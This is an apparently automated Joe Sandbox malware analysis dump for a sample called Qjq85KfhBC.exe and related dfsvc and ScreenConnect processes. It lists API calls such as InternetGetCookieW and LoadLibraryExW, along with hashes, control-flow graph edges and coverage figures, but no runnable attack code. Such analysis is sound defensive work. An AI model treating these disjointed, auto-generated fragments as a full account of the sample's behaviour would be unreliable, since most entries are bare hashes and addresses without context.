                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2278895681-0
                                                                                                                                                                                                                                                        • Opcode ID: f5a6b54e7282e87588c9cc7d398b6c263d70fc67416b047388527084d607db58
                                                                                                                                                                                                                                                        • Instruction ID: 4702faa16a680f60b2d621098a57ceccc9acb554e55a0081a81ba7c365aeb1a4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5a6b54e7282e87588c9cc7d398b6c263d70fc67416b047388527084d607db58
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B01DF72706B1DBF27211AAA5C8CDFB6A6EDECABE43570129F914C3100EB608C41D1F0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 447 9144a8-9144bf GetLastError 448 9144c1-9144cb call 915904 447->448 449 9144cd-9144d2 447->449 448->449 456 91451e-914525 SetLastError 448->456 450 9144d4 call 91480c 449->450 452 9144d9-9144df 450->452 454 9144e1 452->454 455 9144ea-9144f8 call 91595a 452->455 458 9144e2-9144e8 call 914869 454->458 463 9144fa-9144fb 455->463 464 9144fd-914513 call 914296 call 914869 455->464 457 914527-91452c 456->457 465 914515-91451c SetLastError 458->465 463->458 464->456 464->465 465->457
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,009147FE,00917E79,?,0091686F,?,00000004,00000000,?,?,?,00913BCD,?,00000000), ref: 009144AD
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009144E2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914509
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00914516
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0091451F
Memory Dump Source
• Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                        • Opcode ID: d1c38b458259419563b7a32e70cf2e268f5a03f473a97b26a1b9e2fa054b4a33
                                                                                                                                                                                                                                                        • Instruction ID: 23a5d895949e1e32e2fc93c6b913c22bbca8e06b7e9e9e3e5a65cf5e0eb8fab0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1c38b458259419563b7a32e70cf2e268f5a03f473a97b26a1b9e2fa054b4a33
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5001287635460CAB932267346C45FEB226FABDDB757214025F42AE21D2EF748DC2A020

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 470 916176-916181 471 916183-91618b 470->471 472 9161dc-9161de 470->472 473 916194-91619d 471->473 474 91618d-916193 call 914869 471->474 476 9161a6-9161af 473->476 477 91619f-9161a5 call 914869 473->477 474->473 478 9161b1-9161b7 call 914869 476->478 479 9161b8-9161c1 476->479 477->476 478->479 483 9161c3-9161c9 call 914869 479->483 484 9161ca-9161d3 479->484 483->484 484->472 488 9161d5-9161db call 914869 484->488 488->472
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091618E
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009161A0
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009161B2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009161C4
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009161D6
Memory Dump Source
• Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: 40a1aa1192f0940d8bfc2259fa1ca8920a848375507234344ac357af92867048
                                                                                                                                                                                                                                                        • Instruction ID: 88a7065229395af6e190785dbc80c69e81d5988031d64120b079dfd69db6ccd9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40a1aa1192f0940d8bfc2259fa1ca8920a848375507234344ac357af92867048
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DCF06232B1C258BF8670EB55F985DDA77EDAA94B103980855F409DB552C730FCC08650
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DAD
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DBF
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DD2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DE3
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DF4
Memory Dump Source
• Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: c735d6a193837ec70d503887693157a772a81c7a728b1e7aa1a08931045fa94f
                                                                                                                                                                                                                                                        • Instruction ID: 82ed4229938e13c2155aef260cd47a2f027d851fcf72ad13b669bb05dbc9001f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c735d6a193837ec70d503887693157a772a81c7a728b1e7aa1a08931045fa94f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52F0307852C264EFC7716F15FC019C53B64A7A871038002A6F4015A2F5C73505A3EBC0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Qjq85KfhBC.exe,00000104), ref: 00912F93
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091305E
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913068
                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\Qjq85KfhBC.exe
                                                                                                                                                                                                                                                        • API String ID: 2506810119-2502770840
                                                                                                                                                                                                                                                        • Opcode ID: 3281da98408dd1b6e147e9082b68bc3d6a4bf8a101bc6b7bf5ec6be1ec6eabd0
                                                                                                                                                                                                                                                        • Instruction ID: d1209c4735acc12e09500702fd40434d17912a2eb90cdbfda1ac6bbc9a6b3b90
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3281da98408dd1b6e147e9082b68bc3d6a4bf8a101bc6b7bf5ec6be1ec6eabd0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30315C71B0425CEFDB21AF999881AEEBBFCEB89710F108066E4049B251D6718A85DB91
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00912594,00000000,?,00921B50,?,?,?,00912737,00000004,InitializeCriticalSectionEx,0091BC48,InitializeCriticalSectionEx), ref: 009125F0
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00912594,00000000,?,00921B50,?,?,?,00912737,00000004,InitializeCriticalSectionEx,0091BC48,InitializeCriticalSectionEx,00000000,?,009124C7), ref: 009125FA
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00912622
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                        • Opcode ID: 1886a43940c7ec42d0122a4b92c2d031f14ae1968af00cbbb6921456a6dad82a
                                                                                                                                                                                                                                                        • Instruction ID: 201a430c612b6d21b111d7cdb580bfa33ebed117cf663ec60fd84d844349b3dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1886a43940c7ec42d0122a4b92c2d031f14ae1968af00cbbb6921456a6dad82a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1E0483178430CBBDF112B71EC06FD93F59AB18B91F104421F90DE40E5E7A1DAA4D544
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00915784,00000000,00000000,00000000,00000000,?,00915981,00000006,FlsSetValue), ref: 0091580F
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00915784,00000000,00000000,00000000,00000000,?,00915981,00000006,FlsSetValue,0091C4D8,FlsSetValue,00000000,00000364,?,009144F6), ref: 0091581B
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00915784,00000000,00000000,00000000,00000000,?,00915981,00000006,FlsSetValue,0091C4D8,FlsSetValue,00000000), ref: 00915829
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                        • Opcode ID: a041926259002ccb0c5bea6036ce399ae8cea24a08f5a4850fb92ad3a2e55c66
                                                                                                                                                                                                                                                        • Instruction ID: b4f85ed933e013af835ac782996b9a4cd5c4c77bdc05f97e3622b00457dbfa77
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a041926259002ccb0c5bea6036ce399ae8cea24a08f5a4850fb92ad3a2e55c66
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1101FC3272962AEBC7214A789C44BD7775DAF887A0B134964F916D7140D720DC41C6E0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914A27
                                                                                                                                                                                                                                                          • Part of subcall function 0091474D: IsProcessorFeaturePresent.KERNEL32(00000017,0091473C,00000000,?,00000004,00000000,?,?,?,?,00914749,00000000,00000000,00000000,00000000,00000000), ref: 0091474F
                                                                                                                                                                                                                                                          • Part of subcall function 0091474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00914771
                                                                                                                                                                                                                                                          • Part of subcall function 0091474D: TerminateProcess.KERNEL32(00000000), ref: 00914778
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                        • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                        • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                        • Instruction ID: a0fe832a98085281cc93d6e85b3964ba2a9f61d74a7a4a6da24da4980a9e8fd8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B517E75F0021EAFDF14CFA8C881AEEB7B9EF9C710F25816AE454E7341E6359A418B50

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:18.9%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:15
                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                        execution_graph 30125 7ff7bfee0482 30127 7ff7bfee04af InternetGetCookieW 30125->30127 30128 7ff7bfee0679 30127->30128 30115 7ff7bff0ac50 30116 7ff7bff0ac96 30115->30116 30118 7ff7bff0af42 30116->30118 30120 7ff7bfed1608 30116->30120 30119 7ff7bff0b102 30122 7ff7bfed1618 30120->30122 30121 7ff7bfed1683 30121->30119 30122->30121 30123 7ff7bfed1802 LoadLibraryExW 30122->30123 30124 7ff7bfed1836 30123->30124 30124->30119 30129 7ff7bfed994b 30130 7ff7bfed9957 CreateFileW 30129->30130 30132 7ff7bfed9a8c 30130->30132
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243705183.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfed0000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                                                                        • String ID: x]"
                                                                                                                                                                                                                                                        • API String ID: 1029625771-3896027163
                                                                                                                                                                                                                                                        • Opcode ID: 35623898dd4d808f7358fa656ed50f3010c51765657fe9d862eaa52a6451b6e1
                                                                                                                                                                                                                                                        • Instruction ID: 438901b7b6e0e39d15b81b1ccefe4802c8c4147e5e1e8d42f9e3f09492c8ec2a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35623898dd4d808f7358fa656ed50f3010c51765657fe9d862eaa52a6451b6e1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71711931A0CE894FD749EB7C94197F9BBE1EF96320B48426BD00DC7292DE38A815C791
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243705183.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfed0000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8ba26799c446a2a2f0f554dfd004f4fcce6e27b8954835e766102c95a3a4689e
                                                                                                                                                                                                                                                        • Instruction ID: 2abb24ade919687ec1eff5e51cf0d6da652addba25ae832023a79de70fb6a4e2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ba26799c446a2a2f0f554dfd004f4fcce6e27b8954835e766102c95a3a4689e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F81C230508A8D8FDBA8EF1CD8557F977E1FB99310F00426ED84EC7292CB74A9458B91
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243705183.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfed0000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CookieInternet
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 930238652-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243705183.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfed0000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243201963.00007FF7BFDBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFDBD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfdbd000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:13.6%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:12
                                                                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                                                                        execution_graph 10384 7ff7bfedf67b 10385 7ff7bfedf687 CreateFileW 10384->10385 10387 7ff7bfedf7bc 10385->10387 10394 7ff7bfeef219 10395 7ff7bfeef223 GetTokenInformation 10394->10395 10397 7ff7bfeef2d7 10395->10397 10391 7ff7bfed84a7 10392 7ff7bfed84f6 SetProcessMitigationPolicy 10391->10392 10393 7ff7bfed8552 10392->10393 10388 7ff7bfeef458 10389 7ff7bfeef49b CloseHandle 10388->10389 10390 7ff7bfeef4eb 10389->10390

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 476 7ff7bfedf67b-7ff7bfedf710 480 7ff7bfedf712-7ff7bfedf717 476->480 481 7ff7bfedf71a-7ff7bfedf7ba CreateFileW 476->481 480->481 483 7ff7bfedf7c2-7ff7bfedf7f5 481->483 484 7ff7bfedf7bc 481->484 484->483
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1773026118.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7bfed0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 486 7ff7bfeef219-7ff7bfeef2d5 GetTokenInformation 489 7ff7bfeef2dd-7ff7bfeef30e 486->489 490 7ff7bfeef2d7 486->490 490->489
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1773026118.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7bfed0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InformationToken
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4114910276-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 492 7ff7bfed84a7-7ff7bfed8550 SetProcessMitigationPolicy 494 7ff7bfed8552 492->494 495 7ff7bfed8558-7ff7bfed8587 492->495 494->495
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1773026118.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7bfed0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 553 7ff7bfeef458-7ff7bfeef4e9 CloseHandle 555 7ff7bfeef4f1-7ff7bfeef51f 553->555 556 7ff7bfeef4eb 553->556 556->555
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1773026118.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7bfed0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a7b35f8e52ccc289caca7a2115959522c24ec97af46a11469d2ebe84d66d4b86
                                                                                                                                                                                                                                                        • Instruction ID: 12e77d6cd22b6fd84ba8101490df7f37976cfab9035542b566d7e586e37bc429
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7b35f8e52ccc289caca7a2115959522c24ec97af46a11469d2ebe84d66d4b86
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3518B70E003099FDB41EFB4D844BDEBBB2FF89300F50855AE005AB291EB74A986CB50
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dcd6e5f339c2ee58648c66ccbe6139a83109fd4608acfd91ebd78c07e1b726fd
                                                                                                                                                                                                                                                        • Instruction ID: b9f7f5b480deff4800893e9e50bdd438e600c5dbd0cf1b631701e337e24b32d8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcd6e5f339c2ee58648c66ccbe6139a83109fd4608acfd91ebd78c07e1b726fd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50511734600B05CFD724DF29D884A26B7F2FF8D224B248A5CD596DB7A4DB71E841CB58
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
